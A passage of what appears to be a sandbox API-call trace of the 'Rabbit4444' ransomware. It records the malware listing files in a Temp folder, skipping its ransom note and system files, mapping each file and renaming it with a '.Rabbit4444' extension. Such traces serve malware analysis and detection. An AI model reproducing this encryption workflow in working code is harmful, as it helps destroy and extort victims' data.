hHeap=0xe0000) returned 1 [0055.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0055.584] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14689440767) returned 1 [0055.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0055.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0055.584] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.584] CloseHandle (hObject=0x298) returned 1 [0055.585] CloseHandle (hObject=0x278) returned 1 [0055.585] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\a1awP8HsB2PYwBF.jpg.Rabbit4444") returned 65 [0055.585] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\a1awP8HsB2PYwBF.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\a1awp8hsb2pywbf.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\a1awP8HsB2PYwBF.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\a1awp8hsb2pywbf.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0055.586] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2788c60, ftCreationTime.dwHighDateTime=0x1d4ce78, ftLastAccessTime.dwLowDateTime=0xc48279d0, ftLastAccessTime.dwHighDateTime=0x1d4c9f6, ftLastWriteTime.dwLowDateTime=0xc48279d0, ftLastWriteTime.dwHighDateTime=0x1d4c9f6, nFileSizeHigh=0x0, nFileSizeLow=0xb7e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BKy9YzkjWQ30.bmp", cAlternateFileName="BKY9YZ~1.BMP")) returned 1 [0055.586] lstrcmpiW (lpString1="BKy9YzkjWQ30.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.586] lstrcmpiW (lpString1="BKy9YzkjWQ30.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.586] lstrcmpiW (lpString1="BKy9YzkjWQ30.bmp", lpString2="Rabbit4444.exe") returned -1 [0055.586] lstrcmpiW (lpString1="BKy9YzkjWQ30.bmp", lpString2=".") returned 1 [0055.586] lstrcmpiW (lpString1="BKy9YzkjWQ30.bmp", lpString2="..") returned 1 [0055.586] lstrcmpiW (lpString1="BKy9YzkjWQ30.bmp", lpString2="windows") returned -1 [0055.586] lstrcmpiW (lpString1="BKy9YzkjWQ30.bmp", lpString2="bootmgr") returned -1 [0055.586] lstrcmpiW (lpString1="BKy9YzkjWQ30.bmp", lpString2="pagefile.sys") returned -1 [0055.586] lstrcmpiW (lpString1="BKy9YzkjWQ30.bmp", lpString2="boot") returned -1 [0055.586] lstrcmpiW (lpString1="BKy9YzkjWQ30.bmp", lpString2="ids.txt") returned -1 [0055.586] lstrcmpiW (lpString1="BKy9YzkjWQ30.bmp", lpString2="NTUSER.DAT") returned -1 [0055.586] lstrcpyW (in: lpString1=0x130eb7e, lpString2="BKy9YzkjWQ30.bmp" | out: lpString1="BKy9YzkjWQ30.bmp") returned="BKy9YzkjWQ30.bmp" [0055.586] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\BKy9YzkjWQ30.bmp", dwFileAttributes=0x0) returned 1 [0055.586] lstrlenW (lpString="BKy9YzkjWQ30.bmp") returned 16 [0055.586] lstrlenW (lpString="Rabbit4444") returned 10 [0055.586] lstrcmpiW (lpString1="kjWQ30.bmp", lpString2="Rabbit4444") returned -1 [0055.586] lstrlenW (lpString=".dll") returned 4 [0055.586] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0055.586] lstrlenW (lpString=".lnk") returned 4 [0055.586] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0055.586] lstrlenW (lpString=".ini") returned 4 [0055.586] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0055.586] lstrlenW (lpString=".sys") returned 4 [0055.586] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0055.586] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\BKy9YzkjWQ30.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\bky9yzkjwq30.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.587] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.587] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14689742105) returned 1 [0055.587] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2942) returned 1 [0055.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0055.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0055.587] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe80, lpName=0x0) returned 0x298 [0055.587] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe80) returned 0x70000 [0055.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0055.587] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0055.587] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0055.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0055.588] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14689849983) returned 1 [0055.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0055.588] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0055.588] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.588] CloseHandle (hObject=0x298) returned 1 [0055.588] CloseHandle (hObject=0x278) returned 1 [0055.589] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\BKy9YzkjWQ30.bmp.Rabbit4444") returned 62 [0055.589] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\BKy9YzkjWQ30.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\bky9yzkjwq30.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\BKy9YzkjWQ30.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\bky9yzkjwq30.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0055.589] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcadc16f0, ftCreationTime.dwHighDateTime=0x1d4c9fc, ftLastAccessTime.dwLowDateTime=0x224b11b0, ftLastAccessTime.dwHighDateTime=0x1d4c652, ftLastWriteTime.dwLowDateTime=0x224b11b0, ftLastWriteTime.dwHighDateTime=0x1d4c652, nFileSizeHigh=0x0, nFileSizeLow=0xe62c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dQ5fctO2o1SJGoo.rtf", cAlternateFileName="DQ5FCT~1.RTF")) returned 1 [0055.589] lstrcmpiW (lpString1="dQ5fctO2o1SJGoo.rtf", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.589] lstrcmpiW (lpString1="dQ5fctO2o1SJGoo.rtf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.589] lstrcmpiW (lpString1="dQ5fctO2o1SJGoo.rtf", lpString2="Rabbit4444.exe") returned -1 [0055.589] lstrcmpiW (lpString1="dQ5fctO2o1SJGoo.rtf", lpString2=".") returned 1 [0055.589] lstrcmpiW (lpString1="dQ5fctO2o1SJGoo.rtf", lpString2="..") returned 1 [0055.589] lstrcmpiW (lpString1="dQ5fctO2o1SJGoo.rtf", lpString2="windows") returned -1 [0055.589] lstrcmpiW (lpString1="dQ5fctO2o1SJGoo.rtf", lpString2="bootmgr") returned 1 [0055.589] lstrcmpiW (lpString1="dQ5fctO2o1SJGoo.rtf", lpString2="pagefile.sys") returned -1 [0055.589] lstrcmpiW (lpString1="dQ5fctO2o1SJGoo.rtf", lpString2="boot") returned 1 [0055.589] lstrcmpiW (lpString1="dQ5fctO2o1SJGoo.rtf", lpString2="ids.txt") returned -1 [0055.589] lstrcmpiW (lpString1="dQ5fctO2o1SJGoo.rtf", lpString2="NTUSER.DAT") returned -1 [0055.589] lstrcpyW (in: lpString1=0x130eb7e, lpString2="dQ5fctO2o1SJGoo.rtf" | out: lpString1="dQ5fctO2o1SJGoo.rtf") returned="dQ5fctO2o1SJGoo.rtf" [0055.589] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\dQ5fctO2o1SJGoo.rtf", dwFileAttributes=0x0) returned 1 [0055.590] lstrlenW (lpString="dQ5fctO2o1SJGoo.rtf") returned 19 [0055.590] lstrlenW (lpString="Rabbit4444") returned 10 [0055.590] lstrcmpiW (lpString1="1SJGoo.rtf", lpString2="Rabbit4444") returned -1 [0055.590] lstrlenW (lpString=".dll") returned 4 [0055.590] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0055.590] lstrlenW (lpString=".lnk") returned 4 [0055.590] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0055.590] lstrlenW (lpString=".ini") returned 4 [0055.590] lstrcmpiW (lpString1=".rtf", lpString2=".ini") returned 1 [0055.590] lstrlenW (lpString=".sys") returned 4 [0055.590] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0055.590] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\dQ5fctO2o1SJGoo.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\dq5fcto2o1sjgoo.rtf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.590] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.590] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14690091817) returned 1 [0055.590] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=58924) returned 1 [0055.590] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0055.590] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0055.590] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe930, lpName=0x0) returned 0x298 [0055.590] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe930) returned 0x70000 [0055.592] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.592] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0055.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.592] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0055.592] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0055.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0055.592] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14690309521) returned 1 [0055.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0055.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0055.592] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.593] CloseHandle (hObject=0x298) returned 1 [0055.593] CloseHandle (hObject=0x278) returned 1 [0055.594] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\dQ5fctO2o1SJGoo.rtf.Rabbit4444") returned 65 [0055.594] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\dQ5fctO2o1SJGoo.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\dq5fcto2o1sjgoo.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\dQ5fctO2o1SJGoo.rtf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\dq5fcto2o1sjgoo.rtf.rabbit4444"), dwFlags=0x1) returned 1 [0055.594] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3c5d660, ftCreationTime.dwHighDateTime=0x1d4cf21, ftLastAccessTime.dwLowDateTime=0x40ee8620, ftLastAccessTime.dwHighDateTime=0x1d4c999, ftLastWriteTime.dwLowDateTime=0x40ee8620, ftLastWriteTime.dwHighDateTime=0x1d4c999, nFileSizeHigh=0x0, nFileSizeLow=0x9b9b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e3plLTF8rg8Bcl.rtf", cAlternateFileName="E3PLLT~1.RTF")) returned 1 [0055.594] lstrcmpiW (lpString1="e3plLTF8rg8Bcl.rtf", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.594] lstrcmpiW (lpString1="e3plLTF8rg8Bcl.rtf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.594] lstrcmpiW (lpString1="e3plLTF8rg8Bcl.rtf", lpString2="Rabbit4444.exe") returned -1 [0055.594] lstrcmpiW (lpString1="e3plLTF8rg8Bcl.rtf", lpString2=".") returned 1 [0055.594] lstrcmpiW (lpString1="e3plLTF8rg8Bcl.rtf", lpString2="..") returned 1 [0055.594] lstrcmpiW (lpString1="e3plLTF8rg8Bcl.rtf", lpString2="windows") returned -1 [0055.594] lstrcmpiW (lpString1="e3plLTF8rg8Bcl.rtf", lpString2="bootmgr") returned 1 [0055.594] lstrcmpiW (lpString1="e3plLTF8rg8Bcl.rtf", lpString2="pagefile.sys") returned -1 [0055.594] lstrcmpiW (lpString1="e3plLTF8rg8Bcl.rtf", lpString2="boot") returned 1 [0055.594] lstrcmpiW (lpString1="e3plLTF8rg8Bcl.rtf", lpString2="ids.txt") returned -1 [0055.594] lstrcmpiW (lpString1="e3plLTF8rg8Bcl.rtf", lpString2="NTUSER.DAT") returned -1 [0055.595] lstrcpyW (in: lpString1=0x130eb7e, lpString2="e3plLTF8rg8Bcl.rtf" | out: lpString1="e3plLTF8rg8Bcl.rtf") returned="e3plLTF8rg8Bcl.rtf" [0055.595] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\e3plLTF8rg8Bcl.rtf", dwFileAttributes=0x0) returned 1 [0055.595] lstrlenW (lpString="e3plLTF8rg8Bcl.rtf") returned 18 [0055.595] lstrlenW (lpString="Rabbit4444") returned 10 [0055.595] lstrcmpiW (lpString1="rg8Bcl.rtf", lpString2="Rabbit4444") returned 1 [0055.595] lstrlenW (lpString=".dll") returned 4 [0055.595] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0055.595] lstrlenW (lpString=".lnk") returned 4 [0055.595] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0055.595] lstrlenW (lpString=".ini") returned 4 [0055.595] lstrcmpiW (lpString1=".rtf", lpString2=".ini") returned 1 [0055.595] lstrlenW (lpString=".sys") returned 4 [0055.595] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0055.595] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\e3plLTF8rg8Bcl.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\e3plltf8rg8bcl.rtf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.595] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.595] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14690595230) returned 1 [0055.595] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=39835) returned 1 [0055.595] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0055.595] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0055.595] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9ea0, lpName=0x0) returned 0x298 [0055.595] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9ea0) returned 0x70000 [0055.597] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.597] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0055.597] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.597] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0055.597] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.597] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0055.597] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.597] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0055.597] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14690776679) returned 1 [0055.597] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0055.597] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0055.597] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.598] CloseHandle (hObject=0x298) returned 1 [0055.598] CloseHandle (hObject=0x278) returned 1 [0055.598] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\e3plLTF8rg8Bcl.rtf.Rabbit4444") returned 64 [0055.598] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\e3plLTF8rg8Bcl.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\e3plltf8rg8bcl.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\e3plLTF8rg8Bcl.rtf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\e3plltf8rg8bcl.rtf.rabbit4444"), dwFlags=0x1) returned 1 [0055.599] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9ce4f00, ftCreationTime.dwHighDateTime=0x1d4cd19, ftLastAccessTime.dwLowDateTime=0x5e1ff290, ftLastAccessTime.dwHighDateTime=0x1d4d247, ftLastWriteTime.dwLowDateTime=0x5e1ff290, ftLastWriteTime.dwHighDateTime=0x1d4d247, nFileSizeHigh=0x0, nFileSizeLow=0xcfa8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e5htkWuyW-.mp3", cAlternateFileName="E5HTKW~1.MP3")) returned 1 [0055.599] lstrcmpiW (lpString1="e5htkWuyW-.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.599] lstrcmpiW (lpString1="e5htkWuyW-.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.599] lstrcmpiW (lpString1="e5htkWuyW-.mp3", lpString2="Rabbit4444.exe") returned -1 [0055.599] lstrcmpiW (lpString1="e5htkWuyW-.mp3", lpString2=".") returned 1 [0055.599] lstrcmpiW (lpString1="e5htkWuyW-.mp3", lpString2="..") returned 1 [0055.599] lstrcmpiW (lpString1="e5htkWuyW-.mp3", lpString2="windows") returned -1 [0055.599] lstrcmpiW (lpString1="e5htkWuyW-.mp3", lpString2="bootmgr") returned 1 [0055.599] lstrcmpiW (lpString1="e5htkWuyW-.mp3", lpString2="pagefile.sys") returned -1 [0055.599] lstrcmpiW (lpString1="e5htkWuyW-.mp3", lpString2="boot") returned 1 [0055.599] lstrcmpiW (lpString1="e5htkWuyW-.mp3", lpString2="ids.txt") returned -1 [0055.600] lstrcmpiW (lpString1="e5htkWuyW-.mp3", lpString2="NTUSER.DAT") returned -1 [0055.600] lstrcpyW (in: lpString1=0x130eb7e, lpString2="e5htkWuyW-.mp3" | out: lpString1="e5htkWuyW-.mp3") returned="e5htkWuyW-.mp3" [0055.600] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\e5htkWuyW-.mp3", dwFileAttributes=0x0) returned 1 [0055.600] lstrlenW (lpString="e5htkWuyW-.mp3") returned 14 [0055.600] lstrlenW (lpString="Rabbit4444") returned 10 [0055.600] lstrcmpiW (lpString1="kWuyW-.mp3", lpString2="Rabbit4444") returned -1 [0055.600] lstrlenW (lpString=".dll") returned 4 [0055.600] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0055.600] lstrlenW (lpString=".lnk") returned 4 [0055.600] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0055.600] lstrlenW (lpString=".ini") returned 4 [0055.600] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0055.600] lstrlenW (lpString=".sys") returned 4 [0055.600] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0055.600] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\e5htkWuyW-.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\e5htkwuyw-.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.601] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.601] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14691140410) returned 1 [0055.601] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=53160) returned 1 [0055.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0055.601] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0055.601] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd2b0, lpName=0x0) returned 0x298 [0055.601] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd2b0) returned 0x70000 [0055.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0055.603] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0055.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.603] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0055.603] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.603] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0055.603] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14691386458) returned 1 [0055.603] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0055.603] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0055.603] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.604] CloseHandle (hObject=0x298) returned 1 [0055.604] CloseHandle (hObject=0x278) returned 1 [0055.609] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\e5htkWuyW-.mp3.Rabbit4444") returned 60 [0055.609] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\e5htkWuyW-.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\e5htkwuyw-.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\e5htkWuyW-.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\e5htkwuyw-.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0055.610] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2db35b90, ftCreationTime.dwHighDateTime=0x1d4c641, ftLastAccessTime.dwLowDateTime=0x33d43650, ftLastAccessTime.dwHighDateTime=0x1d4d3f9, ftLastWriteTime.dwLowDateTime=0x33d43650, ftLastWriteTime.dwHighDateTime=0x1d4d3f9, nFileSizeHigh=0x0, nFileSizeLow=0xce69, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="g62RCL.ods", cAlternateFileName="")) returned 1 [0055.610] lstrcmpiW (lpString1="g62RCL.ods", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.610] lstrcmpiW (lpString1="g62RCL.ods", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.610] lstrcmpiW (lpString1="g62RCL.ods", lpString2="Rabbit4444.exe") returned -1 [0055.610] lstrcmpiW (lpString1="g62RCL.ods", lpString2=".") returned 1 [0055.610] lstrcmpiW (lpString1="g62RCL.ods", lpString2="..") returned 1 [0055.610] lstrcmpiW (lpString1="g62RCL.ods", lpString2="windows") returned -1 [0055.610] lstrcmpiW (lpString1="g62RCL.ods", lpString2="bootmgr") returned 1 [0055.610] lstrcmpiW (lpString1="g62RCL.ods", lpString2="pagefile.sys") returned -1 [0055.610] lstrcmpiW 